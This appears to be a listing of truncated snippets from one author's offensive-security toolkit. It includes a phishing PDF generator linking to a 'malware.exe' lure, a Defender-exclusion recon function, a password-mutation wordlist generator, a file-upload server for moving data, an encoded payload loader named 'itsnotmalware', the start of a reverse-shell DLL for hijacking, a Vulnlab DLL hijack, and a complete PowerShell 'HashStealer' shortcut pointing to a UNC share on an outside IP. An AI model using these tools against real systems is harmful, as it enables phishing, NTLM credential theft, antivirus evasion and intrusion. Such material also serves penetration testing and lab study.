caueb

# Usage:
# python create-pdf.py -i lock.png -t "Confidental" -u https://localhost/malware.exe -x "This document is locked, click anywhere to open." -o mypdf.pdf

import argparse
from reportlab.lib.pagesizes import A4
from reportlab.pdfgen import canvas
from reportlab.lib.utils import ImageReader

def create_pdf_with_image(image_path, output_path, title, url, text):
    c = canvas.Canvas(output_path, pagesize=A4)

caueb

#!/usr/bin/env python
#
# Title: lookupadmins.py
# Author: @ropnop
# Description: Python script using Impacket to query members of the builtin Administrators group through SAMR
# Similar in function to Get-NetLocalGroup from Powerview
# Won't work against Windows 10 Anniversary Edition unless you already have local admin
# See: http://www.securityweek.com/microsoft-experts-launch-anti-recon-tool-windows-10-server-2016
# Heavily based on original Impacket example scripts written by @agsolino and available here: https://github.com/CoreSecurity/impacket
#

caueb

function Get-DefenderExclusions {
    param (
        [string]$LogName = "Microsoft-Windows-Windows Defender/Operational",
        [int]$EventID = 5007
    )

    # Get all event logs with the specified Event ID efficiently
    $events = Get-WinEvent -FilterHashtable @{LogName=$LogName; Id=$EventID}

    # Filter events that contain the word "Exclusions"

caueb

#!/usr/bin/env python3
"""
- Combine 2 different words
- Combine 2 different words and capitalize the first word
- Combine 2 different words and capitalize the second word
- Combine 2 different words and convert both to uppercase (optional)
- Combine 2 different words and mutate into leet speak (optional)
- Combine 2 different words, mutate into leet speak, and convert to uppercase (optional)
- Combine 3 different words
- Combine 3 different words and capitalize the first word

caueb

#!/usr/bin/env python

"""Extend Python's built-in HTTP server to save files.

curl or wget can be used to send files with options similar to the following:

  curl -X PUT --upload-file somefile.txt http://localhost:8000
  wget -O- --method=PUT --body-file=somefile.txt http://localhost:8000/somefile.txt

__Note__: curl automatically appends the filename onto the end of the URL so

caueb

// Payload encoding using HellsShell (https://github.com/NUL0x4C/HellShell)
// Compile with clang: clang++ -w -Oz -mwindows itsnotmalware.cpp -o itsnotmalware.exe

#include "Windows.h"
#include "stdio.h"
#include <iostream>
#include <string>
#include <regex>

#define _CRT_SECURE_NO_WARNINGS

caueb

// Create the project as DLL, compile it, and just rename it file.cpl
// Simply double click in the file to run

#include <Windows.h>

__declspec(dllexport) LONG CALLBACK CPlApplet(HWND hwndCpl, UINT msg, LPARAM lParam1, LPARAM lParam2) {
    MessageBoxA(NULL, "Test", "Caption", MB_OK);
    return 1;
}

caueb

// Compile with MingW: x86_64-w64-mingw32-gcc-win32 reverse.c -shared -lws2_32 -o Hijack.dll.deploy

#include <winsock2.h>
#include <windows.h>
#include <io.h>
#include <process.h>
#include <sys/types.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

caueb

$shell = New-Object -ComObject WScript.Shell
$shortcut = $shell.CreateShortcut("$env:USERPROFILE\\Desktop\\HashStealer.lnk")
$shortcut.TargetPath = '\\\\192.168.150.134\\tools\\app.ico'
$shortcut.Save()

caueb

// Vulnlab: Bruno
// DLL Hijack of hostfxr.dll

#include <winsock2.h>
#include <stdio.h>

#define _CRT_SECURE_NO_DEPRECATE
#pragma warning (disable : 4996)

#pragma comment(lib, "ws2_32")